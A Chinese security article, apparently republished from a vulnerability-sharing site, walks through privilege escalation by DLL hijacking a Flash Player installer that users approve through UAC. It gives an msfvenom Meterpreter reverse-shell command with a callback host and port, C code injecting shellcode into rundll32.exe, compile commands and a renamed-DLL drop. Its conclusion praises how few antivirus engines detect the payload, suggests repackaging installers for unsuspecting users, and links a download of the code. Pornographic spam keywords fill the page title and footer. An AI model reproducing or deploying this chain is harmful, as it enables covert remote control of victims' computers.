成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

借用UAC完成的提權思路分享

安全 應用安全
UAC(User Account Control,用戶帳戶控制)是微軟為提高系統安全而在Windows Vista中引入的新技術,它要求用戶在執行可能會影響計算機運行的操作或執行更改影響其他用戶的設置的操作之前,提供權限或管理員‌密碼。

0x00 背景

UAC(User Account Control,用戶帳戶控制)是微軟為提高系統安全而在Windows Vista中引入的新技術,它要求用戶在執行可能會影響計算機運行的操作或執行更改影響其他用戶的設置的操作之前,提供權限或管理員‌密碼。也就是說一旦用戶允許啟動的應用程序通過UAC驗證,那么這個程序也就有了管理員權限。如果我們通過某種方式劫持了通過用戶UAC驗證的程序,那么相應的我們的程序也就實現了提權的過程。

0x01 提權過程概述

首先我們找到目標程序,查找其動態加載的dll文件然后將其替換掉,插入我們包含shellcode的dll文件,這樣用戶在安裝此文件的時候就會調用我們的dll文件,并執行我們的shellcode代碼。同時為了防止程序崩掉導致我們的代碼退出,采用注入的方式保證shellcode的穩定執行。在此過程中,如果目標程序請求UAC權限,對于用戶來說這是一個正常的安裝文件,一旦通過UAC驗證,相應我們的shellcode也完成了提權過程。替換安裝包dll文件這種行為太過于敏感,其實最后實現的方式是找到目標程序需要加載的,并且當前目錄又不存在的需要聯網下載的dll文件,我們只需要在該目錄下放一個同名dll文件即可。

0x02 實驗環境

Kali Debian7

Kali集成Metasploit等漏洞利用工具,方便提取shellcode和反彈TCP連接。最好安裝一個Mingw-w64用于編譯c代碼。

windows7 x64

主要的目標測試環境。

Procmon.exe

Procmon是微軟出的一款強大的Windows監視工具,不但可以監視進程/線程,還可以監控到文件系統,注冊表的變化等。

install_flashplayer15x32_mssd_aaa_aih

這里我們以flashplayer安裝文件作為目標文件,版本為15x32_mssd_aaa_aih,可自行下載,或者從最后的打包附件中找到。

0x03 詳細提權過程

查找可劫持的dll文件

首先我們在win7系統下先打開procmon監控軟件,清除一下日志信息,然后運行我們的目標文件install_flashplayer15x32_mssd_aaa_aih,運行過后會彈出UAC選項,需要用戶確認授權。

 

 

這里我們點“是”,然后安裝包開始安裝并自刪除,并從服務器下載所需的文件,這時候就可以關掉了,因為我們只需要看該軟件包都加載了哪些dll文件。

看下Procmon.exe記錄所有行為

 

 

信息量太大,我們需要過濾出有用的信息。

首先是只看我們目標進程的信息,添加過濾規則:

Process Name is install_flashplayer15x32_mssd_aaa_aih

然后是過濾掉加載系統的dll文件,只看安裝包當前目錄下加載的dll文件,我這里安裝包存放在dllhijack文件夾下,添加過濾規則:

Path contains dllhijack

并且該加載dll不存在,需要聯網從服務器下載,最后再添加一個過濾規則:

Result is NAME NOT FOUND

三個過濾規則如下所示:

 

 

經過三個規則過濾后,留下的信息就很明顯了,如下圖所示:

 

 

上邊所列的dll文件都是會嘗試加載,并且找不到,會聯網進行下載的dll文件,因此,我們的目標就是劫持這些dll文件,也不需要替換,直接將我們的dll文件放在安裝包同目錄即可,這也是為什么選擇這個安裝程序測試的原因。如果選擇其他安裝包測試的,最好也是選擇這種聯網安裝類型的,所有文件都從服務器拉取,如果安裝程序沒有對這些從服務器拉取的文件進行效驗,就能夠被劫持。

編寫exploit

找到劫持了dll文件后,我們進入Debian系統用msf生成shellcode,這里我們選擇反彈tcp的shellcode,需要知道服務器ip地址和監聽端口,這里也選擇Debian系統作為服務器,ifconfig查看下ip,設置監聽端口為9000,最后執行如下命令生成shellcode:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.127.133 LPORT=9000 -f c

 

 

為了防止程序掛掉或者退出導致shellcode也跟著退出,采用注入的方式,將shellcode注入rundll32.exe進程,然后連接遠程端口。服務器監聽該端口,一旦有請求就建立會話連接,注入關鍵代碼:

 

  1. if (CreateProcess(0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED | IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {  
  2.     ctx.ContextFlags = CONTEXT_INTEGER | CONTEXT_CONTROL;  
  3.     GetThreadContext(pi.hThread, &ctx);      
  4.  
  5.     ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);      
  6.  
  7.     WriteProcessMemory(pi.hProcess, (PVOID)ep, &code, SCSIZE, 0);      
  8.  
  9.     #ifdef _WIN64  
  10.             ctx.Rip = (DWORD64)ep;  
  11.     #else  
  12.             ctx.Eip = (DWORD)ep;  
  13.     #endif      
  14.  
  15.     SetThreadContext(pi.hThread, &ctx);      
  16.  
  17.     ResumeThread(pi.hThread);  
  18.     CloseHandle(pi.hThread);  
  19.     CloseHandle(pi.hProcess);  

 

最后將程序編譯,這里編譯直接在Debian系統下用Mingw-w64編譯,命令入下:

root@idhyt:~/maldemo# i686-w64-mingw32-gcc template.c -o template.dll –shared

root@idhyt:~/maldemo# file template.dll

template.dll: PE32 executable (DLL) (console) Intel 80386, for MS Windows

將編譯好的template.dll拷貝到win7系統中備用。

debian系統設置服務器并監聽9000端口,所有命令如下:

 

 

提權

將編譯的template.dll文件放在install_flashplayer15x32_mssd_aaa_aih目錄下,從我們監控到的可劫持dll文件中選擇一個,這里我選擇dhcpcsv6.dll。將我們的dll文件改名為dhcpcsvc6.dll,其他dll文件可自行嘗試。之后重新運行安裝包,彈出UAC選項后點“是”。

之后我們在debian系統的服務端會看到我們已經監聽到了這個端口,看下會話信息:

 

 

查看下當前uid,然后執行getsystem命令權限:

 

 

可以看到已經提權成功,然后進入shell查看下文件,運行個計算器什么的

 

 

0x04 總結

UAC很大程度上減少PC受到惡意軟件侵害的機會,但是并不表明是不可被利用的。通過這種dll劫持方式,可以將dll文件設置為隱藏,并將正常的軟件(如adobe flash player)打包給用戶,用戶基本是察覺不到的,一旦用戶正常安裝,機器就會被攻擊者控制。一些病毒通過劫持lpk.dll等系統dll文件造成的病毒體執行,也是利用這種思路,但是替換系統文件這種敏感操作,基本逃不過殺軟的監控了。

各殺軟廠商對shellcode這種檢測和防御也不夠嚴格,直接從msf中提取的shellcode,沒做任何變形和過殺軟處理,然后virustotal網站上掃描結果如下:

 

 

可以看出總共用了56中殺毒軟件掃描,報毒的只有16個,然后看下國內的殺軟:

 

 

國內殺軟全都沒有報毒,所以通過dll劫持提權還是有很大的使用空間。 代碼和安裝包上傳百度網盤:鏈接: http://pan.baidu.com/s/1ntAbfQD 密碼: rmsq 解壓碼:ks123456

責任編輯:藍雨淚 來源: 烏云知識庫
相關推薦

2011-03-07 11:36:23

FileZillaSe

2021-01-06 08:04:30

Linux方式提權

2021-01-13 08:14:36

Windows提權漏洞攻擊

2009-07-25 16:52:29

2013-11-29 15:34:00

2021-05-01 20:52:30

漏洞網絡安全網絡攻擊

2023-06-11 17:24:26

2016-12-12 09:11:20

2015-03-13 10:06:55

2019-12-01 22:34:42

提權web安全漏洞

2024-07-31 08:46:10

2017-03-25 20:30:15

2009-07-25 17:24:45

2012-11-15 13:44:36

Plesk密碼提權密碼

2024-01-15 00:25:59

2018-07-05 10:44:09

Windows提權漏洞

2016-09-26 14:40:25

Windows內網實用命令

2020-11-16 10:55:41

Windows

2022-03-10 09:41:15

漏洞Linux內核

2017-04-17 19:48:51

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 五月网婷婷 | 毛片一区二区三区 | 亚洲精品视频一区二区三区 | 日韩精品一区二区三区在线 | 男女羞羞免费视频 | 一区二区成人 | 九色视频网站 | 亚洲福利一区二区 | 中文二区 | 三级国产三级在线 | 国产精品日韩一区二区 | 天堂一区 | 天天综合久久 | 国产精品视频久久久 | 天天躁日日躁狠狠躁2018小说 | aaa一区| 国产日韩一区二区三免费高清 | 成人精品影院 | 亚洲一区中文字幕 | 久久久久久久久国产 | 插插插干干干 | 亚洲色图婷婷 | 四虎成人av | 亚洲国产成人av | 中文字幕一区在线观看视频 | 97视频在线看 | 国产日韩91| 国产一区二区激情视频 | 日韩一区二| 成人欧美一区二区三区在线播放 | 国产高清精品一区二区三区 | av在线成人 | 色视频在线播放 | 亚洲品质自拍视频网站 | 久久99国产精品久久99果冻传媒 | 久草中文在线 | 亚洲电影成人 | 国产一级视频在线 | 欧洲免费毛片 | 999国产视频 | 国产精品一区二区三区久久 |